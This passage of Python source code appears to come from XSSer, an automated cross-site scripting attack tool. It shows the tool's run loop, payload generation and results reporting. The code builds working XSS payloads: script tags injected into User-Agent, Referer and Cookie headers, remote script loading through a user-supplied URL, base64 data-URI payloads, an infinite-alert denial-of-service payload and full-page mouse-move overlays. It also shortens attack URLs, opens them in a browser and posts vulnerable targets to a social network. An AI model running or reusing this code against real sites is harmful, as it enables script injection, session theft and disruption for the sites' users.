def run_crawl(self, crawler, url, options):
def _cb(request, result):
pass
#self.crawled_urls += result
def _error_cb(request, error):
for reporter in self._reporters:
reporter.mosquito_crashed(url, str(error[0]))
traceback.print_tb(error[2])
def crawler_main(args):
return crawler.crawl(*args)
crawler.crawl(url, int(options.crawler_width),
int(options.crawling),options.crawler_local)
"""
self.pool.addRequest(crawler_main,
[[url, int(options.crawler_width), int(options.crawling),
options.crawler_local]],
_cb,
_error_cb)
"""
def poll_workers(self):
try:
self.pool.poll()
except NoResultsPending:
pass
def try_running(self, func, error, args=[]):
"""
Try running a function and print an error if it fails and exits with
a fatal error.
"""
try:
return func(*args)
except Exception, e:
self.report(error, "error")
#self.report(str(e.message), "")
if DEBUG:
traceback.print_exc()
#sys.exit()
def create_fake_image(self, filename, payload):
"""
Create -fake- image with code injected
"""
options = self.options
filename = options.imx
payload = options.script
image_xss_injections = ImageInjections()
image_injections = image_xss_injections.image_xss(options.imx , options.script)
return image_injections
def create_fake_flash(self, filename, payload):
"""
Create -fake- flash movie (.swf) with code injected
"""
options = self.options
filename = options.flash
payload = options.script
flash_xss_injections = FlashInjections()
flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
return flash_injections
def create_gtk_interface(self):
"""
Create GTK Interface
"""
options = self.options
from XSSer.gtkcontroller import Controller, reactor
uifile = "xsser.ui"
controller = Controller(uifile, self)
self._reporters.append(controller)
if reactor:
reactor.run()
else:
import gtk
gtk.main()
return controller
def run(self, opts=None):
"""
Run xsser.
"""
self._landing = False
for reporter in self._reporters:
reporter.start_attack()
if opts:
options = self.create_options(opts)
self.set_options(options)
if not self.mothership and not self.hub:
self.hub = HubThread(self)
self.hub.start()
options = self.options
# step 0: third party tricks
if options.imx: # create -fake- image with code injected
p = self.optionParser
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("[Image XSS auto-builder]...remember, only IE6 and below versions ;)")
self.report('='*75)
self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
self.report('='*75 + "\n")
if options.flash: # create -fake- flash movie (.swf) with code injected
p = self.optionParser
self.report('='*75)
self.report(str(p.version))
self.report('='*75)
self.report("[Flash Attack! XSS auto-builder]...ready to be embedded ;)")
self.report('='*75)
self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
self.report('='*75 + "\n")
if options.xsser_gtk:
self.create_gtk_interface()
return
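# resize the worker pool to match the requested --threads count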
nthreads = max(1, abs(options.threads))
nworkers = len(self.pool.workers)
if nthreads != nworkers:
if nthreads < nworkers:
self.pool.dismissWorkers(nworkers-nthreads)
else:
self.pool.createWorkers(nthreads-nworkers)
for reporter in self._reporters:
reporter.report_state('scanning')
# step 1: get urls
urls = self.try_running(self._get_attack_urls, "\nInternal error getting -targets-. Look at the end of this Traceback to see what's wrong")
for reporter in self._reporters:
reporter.report_state('arming')
# step 2: get payloads
payloads = self.try_running(self.get_payloads, "\nInternal error getting -payloads-")
for reporter in self._reporters:
reporter.report_state('cloaking')
if options.Dwo:
payloads = self.process_payloads_ipfuzzing(payloads)
elif options.Doo:
payloads = self.process_payloads_ipfuzzing_octal(payloads)
for reporter in self._reporters:
reporter.report_state('locking targets')
# step 3: get query string
query_string = self.try_running(self.get_query_string, "\nInternal error getting query -string-")
# step 4: print curl options if requested
if options.verbose:
Curl.print_options()
for reporter in self._reporters:
reporter.report_state('sanitize')
urls = self.sanitize_urls(urls)
for reporter in self._reporters:
reporter.report_state('attack')
# step 5: perform attack
self.try_running(self.attack, "\nInternal problems running attack: ", (urls, payloads, query_string))
for reporter in self._reporters:
reporter.report_state('reporting')
if len(self.final_attacks):
self.report("Waiting for tokens to arrive")
while self._ongoing_requests and not self._landing:
if not self.pool:
self.mothership.poll_workers()
else:
self.poll_workers()
time.sleep(0.2)
for reporter in self._reporters:
reporter.report_state('final sweep..')
print("="*75 + "\n")
if self.pool:
self.pool.dismissWorkers(len(self.pool.workers))
self.pool.joinAllDismissedWorkers()
start = time.time()
while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
time.sleep(0.2)
for reporter in self._reporters:
reporter.report_state('landing.. '+str(int(5.0 - (time.time() - start))))
if self.final_attacks:
self.report("Forcing a reverse connection XSSer will certificate that your target is 100% vulnerable\n")
for final_attack in self.final_attacks.itervalues():
if not final_attack['url'] == None:
self.report("Connecting from:", final_attack['url'] , "\n")
self.report(",".join(self.successfull_urls) , "is connecting remotely to XSSer... You have it! ;-)", "\n")
self.report("="*50 + "\n")
for reporter in self._reporters:
reporter.end_attack()
if self.mothership:
self.mothership.remove_reporter(self)
print("="*75 + "\n")
self.report("Mosquito(s) landed!\n")
else:
self.report("Mosquito(s) landed!")
self.print_results()
def sanitize_urls(self, urls):
all_urls = set()
#from urlparse import urlparse
for url in urls:
#o = urlparse(url)
if url.startswith("http://") or url.startswith("https://"):
# url sanitize info
#print o
#print "----------"
self.urlspoll.append(url)
all_urls.add(url)
else:
self.report("\nThis target: (" + url + ") is not a correct url [DISCARDED]\n")
url = None
return all_urls
def land(self, join=False):
self._landing = True
if self.hub:
self.hub.shutdown()
if join:
self.hub.join()
self.hub = None
def _prepare_extra_attacks(self):
"""
Setup extra attacks.
"""
options = self.options
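# XSA / XSR / COO: plant hashed <script>alert()</script> probes in the
# User-Agent, Referer and Cookie headers respectively; each hash is recorded
# in self._ongoing_attacks so its reflection can be attributed later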
if options.xsa:
hashing = self.generate_hash('xsa')
Curl.agent = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['xsa'] = hashing
self.xsa_injection = self.xsa_injection + 1
if options.xsr:
hashing = self.generate_hash('xsr')
Curl.referer = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['xsr'] = hashing
self.xsr_injection = self.xsr_injection + 1
if options.coo:
hashing = self.generate_hash('cookie')
Curl.cookie = "<script>alert('" + hashing + "')</script>"
self._ongoing_attacks['cookie'] = hashing
self.coo_injection = self.coo_injection + 1
def attack(self, urls, payloads, query_string):
"""
Perform an attack on the given urls, with the provided payloads and
query_string.
"""
for url in urls:
if self.pool:
self.poll_workers()
else:
self.mothership.poll_workers()
if not self._landing:
self.attack_url(url, payloads, query_string)
def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
"""
Generate a real attack url, by using data from a successful test run, but setting
a real attack payload, using (or not) special techniques.
This method also applies DOM stealth mechanisms.
"""
user_attack_payload = payload['payload']
if self.options.finalpayload:
user_attack_payload = self.options.finalpayload
elif self.options.finalremote:
user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
elif (self.options.finalpayload or self.options.finalremote) and payload["browser"] == "[Data Control Protocol Injection]":
user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '"></a>'
elif (self.options.finalpayload or self.options.finalremote) and payload["browser"] == "[Induced Injection]":
user_attack_payload = self.options.finalpayload
if self.options.dos:
user_attack_payload = '<script>for(;;)alert("You was DoSed!!");</script>'
if self.options.doss:
user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
if self.options.b64:
user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
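# note: the base64 blob above decodes to <script>alert('XSS')</script>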
if self.options.onm:
user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
if self.options.ifr:
user_attack_payload = '<iframe src="' + user_attack_payload + '"></iframe>'
do_anchor_payload = self.options.anchor
anchor_data = None
attack_hash = None
if 'PAYLOAD' in payload['payload']:
if user_attack_payload == "":
attack_hash = self.generate_hash('final')
user_attack_payload = payload['payload']
user_attack_payload = payload['payload'].replace('PAYLOAD', attack_hash)
else:
user_attack_payload = payload['payload'].replace('PAYLOAD', user_attack_payload)
if 'XSS' in user_attack_payload:
attack_hash = self.generate_hash('final')
user_attack_payload = user_attack_payload.replace('XSS', attack_hash)
if do_anchor_payload:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
dest_url = dest_url.replace('?', '#')
else:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
if attack_hash:
self.final_attacks[attack_hash] = {'url':dest_url}
return dest_url
def token_arrived(self, attack_hash):
if not self.mothership:
# only the mothership calls on token arriving.
self.final_attack_callback(attack_hash)
def final_attack_callback(self, attack_hash):
#if not self.mothership:
# for reporter in self._reporters:
# reporter.token_arrived(attack_hash)
if attack_hash in self.final_attacks:
dest_url = self.final_attacks[attack_hash]['url']
self.report('[*] Browser check:', dest_url)
for reporter in self._reporters:
reporter.add_checked(dest_url)
if self._reporter:
from twisted.internet import reactor
reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
self.final_attacks.pop(attack_hash)
def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
generate_shorturls = self.options.shorturls
if generate_shorturls:
shortener = ShortURLReservations(self.options.shorturls)
if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
shorturl = shortener.process_url(real_attack_url)
self.report("[/] Shortered URL (Final Attack):", shorturl)
else:
shorturl = shortener.process_url(dest_url)
self.report("[/] Shortered URL (Injection):", shorturl)
return real_attack_url
def report(self, *args):
args = list(map(lambda s: str(s), args))
formatted = " ".join(args)
if not self.options.silent:
print(formatted)
for reporter in self._reporters:
reporter.post(formatted)
def print_results(self):
"""
Print results from an attack.
"""
self.report('\n' + '='*75)
total_injections = len(self.hash_found) + len(self.hash_notfound)
if len(self.hash_found) + len(self.hash_notfound) == 0:
pass
else:
self.report("[*] Final Results:")
self.report('='*75 + '\n')
self.report("- Injections:", total_injections)
self.report("- Failed:", len(self.hash_notfound))
self.report("- Sucessfull:", len(self.hash_found))
try:
_accur = len(self.hash_found) * 100 / total_injections
except ZeroDivisionError:
_accur = 0
self.report("- Accur: %s %%\n" % _accur)
if not len(self.hash_found) and self.hash_notfound:
self.report('='*75 + '\n')
pass
else:
self.report('='*75)
self.report("[*] List of possible XSS injections:")
self.report('='*75 + '\n')
#XXX better control of flow
for line in self.hash_found:
attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
if self.options.fileoutput:
fout = open("XSSlist.dat", "a")
if line[2] == "xsr":
self.xsr_founded = self.xsr_founded + 1
xsr_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_founded > 1:
self.xsr_founded = self.xsr_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]), "[", Curl.referer, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Referer Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[6])+"/"+str(line[4]) + "[" + Curl.referer + "]" + "\n")
fout.write("[!] Special: " + "This injections looks like a Cross Site Referer Scripting" + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[2] == "xsa":
self.xsa_founded = self.xsa_founded + 1
xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_founded > 1:
self.xsa_founded = self.xsa_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),
"[", Curl.agent, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Agent Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + Curl.agent + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Cross Site Agent Scripting " + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[2] == "coo":
self.coo_founded = self.coo_founded + 1
coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_founded > 1:
self.coo_founded = self.coo_founded - 1
pass
else:
self.report("[I] Target:", line[6])
self.report("[+] Injection:",str(line[6])+"/"+str(line[4]),"[",
Curl.cookie, "]")
self.report("[!] Special:", "This injection looks like a Cross Site Cookie Scripting")
self.report("[-] Method:", line[2])
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: "+ str(line[6])+"/"+str(line[4]) + "[" + Curl.cookie + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Cross Site Cookie Scripting " + "\n")
fout.write("[-] Method: " + line[2] + "\n" + '-'*50 +"\n")
elif line[1] == "[Data Control Protocol Injection]":
self.dcp_founded = self.dcp_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[6])+"/"+str(line[4]),
"[", line[5]["payload"] , "]")
self.report("[!] Special:", "This injection looks like a Data Control Protocol flaw")
if self.options.finalpayload or self.options.finalremote:
self.report("[*] Final Attack: ", attack_url)
else:
self.report("[*] Final Attack: ", line[5]["payload"])
self.report("[-] Method: dcp")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[6]) + "/" + str(line[4]) + "[" + line[5]["payload"] + "]" + "\n")
fout.write("[!] Special: " + "This injection looks like a Data Control Protocol flaw" + "\n")
if self.options.finalpayload or self.options.finalremote:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
fout.write("[*] Final Attack: " + line[5]["payload"] + "\n")
fout.write("[-] Method: dcp" + "\n" + '-'*50 +"\n")
elif line[1] == "[Document Object Model Injection]":
self.dom_founded = self.dom_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Special:", "This injection looks like a Document Object Model flaw")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: dom")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Special: " + "This injection looks like a Document Object Model flaw" + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: dom" + "\n" + '-'*50 +"\n")
elif line[1] == "[Induced Injection]":
self.httpsr_founded = self.httpsr_founded +1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Special:", "This injection looks like a HTTP Splitting Response")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: ind")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Special: " + "This injection looks like a HTTP Splitting Response" + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: ind" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[hashed_precheck_system]":
self.false_positives = self.false_positives + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!")
self.report("[-] Method: hash")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[!] Checker: This injection looks like a -false positive- result!. Verify it manually!" + "\n")
fout.write("[-] Method: hash" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[manual_injection]":
self.manual_founded = self.manual_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", str(line[0]))
self.report("[-] Method: manual")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + str(line[0]) + "\n")
fout.write("[-] Method: manual" + "\n" + '-'*50 +"\n")
elif line[5]["browser"] == "[Heuristic test]":
if str(line[5]["payload"]).strip('XSS') == "\\" or str(line[5]["payload"]).strip('XSS') == "/" or str(line[5]["payload"]).strip('XSS') == ">" or str(line[5]["payload"]).strip('XSS') == "<" or str(line[5]["payload"]).strip('XSS') == ";" or str(line[5]["payload"]).strip('XSS') == "'" or str(line[5]["payload"]).strip('XSS') == '"' or str(line[5]["payload"]).strip('XSS') == "=":
self.report("[I] Target:", line[6])
self.report("[+] Parameter(s):", "[",
str(line[5]["payload"]).strip('XSS') , "]")
self.report("[!] Special:", "This parameter(s) looks like is NOT -completly- FILTERED on target code")
self.report("[-] Method: heuristic")
self.report('-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Parameter(s): " + "[" + str(line[5]["payload"]).strip('XSS') + "]" + "\n")
fout.write("[!] Special: " + "This parameter(s) looks like is NOT -completly- FILTERED on target code" + "\n")
fout.write("[-] Method: heuristic" + "\n" + '-'*50 +"\n")
else:
pass
else:
self.auto_founded = self.auto_founded + 1
self.report("[I] Target:", line[6])
self.report("[+] Injection:", line[0])
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
self.report("[*] Final Attack: ", attack_url)
else:
pass
self.report("[-] Method: xss")
self.report("[-] Browsers:", line[1], "\n", '-'*50, "\n")
if self.options.fileoutput:
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[I] Target: " + line[6] + "\n")
fout.write("[+] Injection: " + line[0] + "\n")
if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
fout.write("[*] Final Attack: " + attack_url + "\n")
else:
pass
fout.write("[-] Method: xss" + "\n")
fout.write("[-] Browsers: "+ line[1] + "\n" + '-'*50 + "\n")
if self.options.tweet:
# XXX recover sns and username automatically
self.report("[!] Trying to publish on: " + self.sn_service + "/" + self.sn_username)
if self.options.fileoutput:
fout.write("[!] Published on: " + self.sn_service + "/" + self.sn_username + "\n")
fout.write("="*75 + "\n")
if self.options.launch_browser:
if self.options.dcp:
#XXX implement DCP autolauncher
self.report("\n[@] DCP autolauncher not implemented, yet. (http://docs.python.org/library/webbrowser.html)")
self.report("[!] Aborting all launching process!!. If you want to 'auto-launch' other results, try without --Dcp option\n")
self.report("[I] If you have some DCP success injections discovered, try to open -manually- these results in the website of your target. You will see that works! ;)\n")
else:
if attack_url == "":
pass
else:
self._webbrowser.open(attack_url)
# heuristic always with statistics
if self.options.heuristic:
self.options.statistics = True
# some statistics reports
if self.options.statistics:
# heuristic test results
if self.options.heuristic:
self.report('='*75)
self.report("[*] Heuristic:")
self.report('='*75)
self.report('-'*50)
self.report(' ', " <not-filt>", " <filtered>", " =" , " ASCII",
" +", " UNE/HEX", " +", " DEC")
# semicolon results
heuris_semicolon_total_founded = self.heuris_semicolon_notfounded + self.heuris_une_semicolon_founded + self.heuris_dec_semicolon_founded
self.report('; ', " ", self.heuris_semicolon_founded, " ", heuris_semicolon_total_founded, " ",
self.heuris_semicolon_notfounded, " ",
self.heuris_une_semicolon_founded, " ",
self.heuris_dec_semicolon_founded)
# backslash results
heuris_backslash_total_founded = self.heuris_backslash_notfounded + self.heuris_une_backslash_founded + self.heuris_dec_backslash_founded
self.report('\\ ', " ", self.heuris_backslash_founded, " ", heuris_backslash_total_founded, " ",
self.heuris_backslash_notfounded, " ",
self.heuris_une_backslash_founded, " ",
self.heuris_dec_backslash_founded)
# slash results
heuris_slash_total_founded = self.heuris_slash_notfounded + self.heuris_une_slash_founded + self.heuris_dec_slash_founded
self.report("/ ", " ", self.heuris_slash_founded, " ",
heuris_slash_total_founded, " ",
self.heuris_slash_notfounded, " ",
self.heuris_une_slash_founded, " ",
self.heuris_dec_slash_founded)
# minor results
heuris_minor_total_founded = self.heuris_minor_notfounded + self.heuris_une_minor_founded + self.heuris_dec_minor_founded
self.report("< ", " ", self.heuris_minor_founded, " ",
heuris_minor_total_founded, " ",
self.heuris_minor_notfounded, " ",
self.heuris_une_minor_founded, " ",
self.heuris_dec_minor_founded)
# mayor results
heuris_mayor_total_founded = self.heuris_mayor_notfounded + self.heuris_une_mayor_founded + self.heuris_dec_mayor_founded
self.report("> ", " ", self.heuris_mayor_founded, " ",
heuris_mayor_total_founded, " ",
self.heuris_mayor_notfounded, " ",
self.heuris_une_mayor_founded, " ",
self.heuris_dec_mayor_founded)
# doublecolon results
heuris_doublecolon_total_founded = self.heuris_doublecolon_notfounded + self.heuris_une_doublecolon_founded + self.heuris_dec_doublecolon_founded
self.report('" ', " ", self.heuris_doublecolon_founded, " ", heuris_doublecolon_total_founded, " ",
self.heuris_doublecolon_notfounded, " ",
self.heuris_une_doublecolon_founded, " ",
self.heuris_dec_doublecolon_founded)
# colon results
heuris_colon_total_founded = self.heuris_colon_notfounded + self.heuris_une_colon_founded + self.heuris_dec_colon_founded
self.report("' ", " ", self.heuris_colon_founded, " ",
heuris_colon_total_founded, " ",
self.heuris_colon_notfounded, " ",
self.heuris_une_colon_founded, " ",
self.heuris_dec_colon_founded)
# equal results
heuris_equal_total_founded = self.heuris_equal_notfounded + self.heuris_une_equal_founded + self.heuris_dec_equal_founded
self.report("= ", " ", self.heuris_equal_founded, " ",
heuris_equal_total_founded, " ",
self.heuris_equal_notfounded, " ",
self.heuris_une_equal_founded, " ",
self.heuris_dec_equal_founded)
self.report('-'*70)
total_heuris_founded = heuris_semicolon_total_founded + heuris_backslash_total_founded + heuris_slash_total_founded + heuris_minor_total_founded + heuris_mayor_total_founded + heuris_doublecolon_total_founded + heuris_colon_total_founded + heuris_equal_total_founded
total_heuris_params = total_heuris_founded + self.heuris_semicolon_founded + self.heuris_backslash_founded + self.heuris_slash_founded + self.heuris_minor_founded + self.heuris_mayor_founded + self.heuris_doublecolon_founded + self.heuris_colon_founded + self.heuris_equal_founded
try:
_accur = total_heuris_founded * 100 / total_heuris_params
except ZeroDivisionError:
_accur = 0
self.report('Target(s) Filtering Accur: %s %%' % _accur)
self.report('-'*70)
# statistics block
if len(self.hash_found) + len(self.hash_notfound) == 0:
pass
else:
self.report('='*75)
self.report("[*] Statistic:")
self.report('='*75)
test_time = datetime.datetime.now() - self.time
self.report('-'*50)
self.report("Test Time Duration: ", test_time)
self.report('-'*50 )
total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
self.report("Total Connections:", total_connections)
self.report('-'*25)
self.report("200-OK:" , self.success_connection , "|", "404:" ,
self.not_connection , "|" , "503:" ,
self.forwarded_connection , "|" , "Others:",
self.other_connection)
try:
_accur = self.success_connection * 100 / total_connections
except ZeroDivisionError:
_accur = 0
self.report("Connec: %s %%" % _accur)
self.report('-'*50)
total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
self.report("Total Payloads:", total_payloads)
self.report('-'*25)
self.report("Checker:", self.check_positives, "|", "Manual:",
self.manual_injection, "|" , "Auto:" ,
self.auto_injection ,"|", "DCP:",
self.dcp_injection, "|", "DOM:", self.dom_injection,
"|", "Induced:", self.httpsr_injection, "|" , "XSR:",
self.xsr_injection, "|", "XSA:",
self.xsa_injection , "|", "COO:",
self.coo_injection)
self.report('-'*50)
self.report("Total Injections:" ,
len(self.hash_notfound) + len(self.hash_found))
self.report('-'*25)
self.report("Failed:" , len(self.hash_notfound), "|",
"Sucessfull:" , len(self.hash_found))
try:
_accur = len(self.hash_found) * 100 / total_injections
except ZeroDivisionError:
_accur = 0
self.report("Accur : %s %%" % _accur)
self.report('-'*25)
total_discovered = self.false_positives + self.manual_founded + self.auto_founded + self.dcp_founded + self.dom_founded + self.xsr_founded + self.xsa_founded + self.coo_founded
self.report("Total Discovered:", total_discovered)
self.report('-'*25)
self.report("Checker:", self.false_positives, "|",
"Manual:",self.manual_founded, "|", "Auto:",
self.auto_founded, "|", "DCP:", self.dcp_founded,
"|", "DOM:", self.dom_founded, "|", "Induced:",
self.httpsr_founded, "|" , "XSR:", self.xsr_founded,
"|", "XSA:", self.xsa_founded, "|", "COO:",
self.coo_founded)
self.report('-'*50)
self.report("False positives:", self.false_positives, "|",
"Vulnerables:",
total_discovered - self.false_positives)
self.report('-'*25)
# efficiency ranking:
# algor= vulnerables + false positives - failed * extras
# extras:
## 1 vuln -> identi.ca: +10000
## >3 vuln -> 1 test: +4500
## 1 vuln -> 1 test: +500
## >100 payloads: +150
## proxy and heuristic: +100
## final payload injected: +100
## --Cem and --Doo: +75
## manual payload injected and --Dcp: +25
## checker: +10
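# Worked example with illustrative numbers (not real results): suppose 2 vulns
# were found, --tweet was used (+10000), more than 100 payloads were sent (+150)
# and a proxy was set (+100). Then mana = 10250 before the final step, and the
# last formula gives mana = (2 * 10250) + 10250 - 4500 = 26250.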
mana = 0
if self.hash_found and self.options.tweet:
mana = mana + 10000
if len(self.hash_found) > 3:
mana = mana + 4500
if len(self.hash_found) == 1:
mana = mana + 500
if total_payloads > 100:
mana = mana + 150
if self.options.proxy:
mana = mana + 100
if self.options.heuristic:
mana = mana + 100
if self.options.finalpayload or self.options.finalremote:
mana = mana + 100
if self.options.Cem or self.options.Doo:
mana = mana + 75
if self.options.heuristic:
mana = mana + 50
if self.options.script and not self.options.fuzz:
mana = mana + 25
if self.options.followred and self.options.fli:
mana = mana + 25
if self.options.dcp:
mana = mana + 25
if self.options.hash:
mana = mana + 10
mana = (len(self.hash_found) * mana) + mana -4500
# enjoy it :)
self.report("Mana:", mana)
self.report("-"*50)
#self.report('='*75 + '\n')
# end statistics block
c = Curl()
if not len(self.hash_found) and self.hash_notfound:
if self.options.hash:
self.report("[!] Checker: looks like your target(s) does not repeat all received code.\n")
if self.options.fuzz or self.options.dcp or self.options.script:
self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
else:
self.report("[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)\n")
self.report('='*75 + '\n')
if self.options.fileoutput:
fout = open("XSSlist.dat", "a")
fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
fout.write("---------------------" + "\n")
fout.write("[!] Not reported 'positive' results for: \n" + "[-] " + str('\n[-] '.join([u[0] for u in self.hash_notfound])) + "\n")
fout.write("="*75 + "\n")
fout.close()
else:
# some exits and info for some bad situations:
if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
self.report("\nXSSer cannot send data :( ... maybe is -something- blocking our connections!?\n")
if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
self.report("\nCrawlering system cannot recieve feedback from 'mosquitoes' on target host... try again :(\n")
#if len(self.hash_found) + len(self.hash_notfound) == 0 and c.info()["http-code"] != "200":
# self.report("\nTarget responses with different HTTP code to: 200 [" + c.info()["http-code"] + "] ... cannot inject! :(\n")
#self.report('='*75 + '\n')
# print results to xml file
if self.options.filexml:
xml_report_results = xml_reporting(self)
xml_report_results.print_xml_results(self.options.filexml)
# publish discovered vulnerabilities
if self.options.tweet and self.hash_found:
try:
for line in self.hash_found:
sns_publish_results = publisher(self)
shortener = ShortURLReservations('is.gd')
shorturl_host = shortener.process_url(str(line[0]))
tags = '#xss '
if not self.options.tt:
msg = tags + 'vulnerable target: ' + shorturl_host
else:
tags = tags + self.options.tt
msg = tags + ' vulnerable target: ' + shorturl_host
username = self.sn_username
password = self.sn_password
url = self.sn_url
sns_publish_results.send_to_identica(msg, username, password, url)
except:
self.report("\n[I] Error publishing some discovered XSS injections\n")
pass
if __name__ == "__main__":
app = xsser()
options = app.create_options()
if options:
app.set_options(options)
app.run()
app.land(True)
```
#### File: XSSer/post/shorter.py
```python
import urllib
import pycurl
from cStringIO import StringIO
from BeautifulSoup import BeautifulSoup
class ShortURLReservations(object):
#options = [['-foo!', 'do stuff']]
def __init__(self, service='tinyurl'):
self._service = service
self._parse_shortener()
self._extra = {}
def _parse_shortener(self):
"""
List of valid link shorteners
"""
if self._service == 'tinyurl' or not self._service:
self._url = 'http://tinyurl.com/create.php'
self._par = 'url'
self._method = 'get'
elif self._service == 'is.gd':
self._url = 'http://is.gd/create.php'
self._par = 'url'
self._method = 'post'
def process_url(self, url):
dest = urllib.urlencode({self._par: url})
out = StringIO()
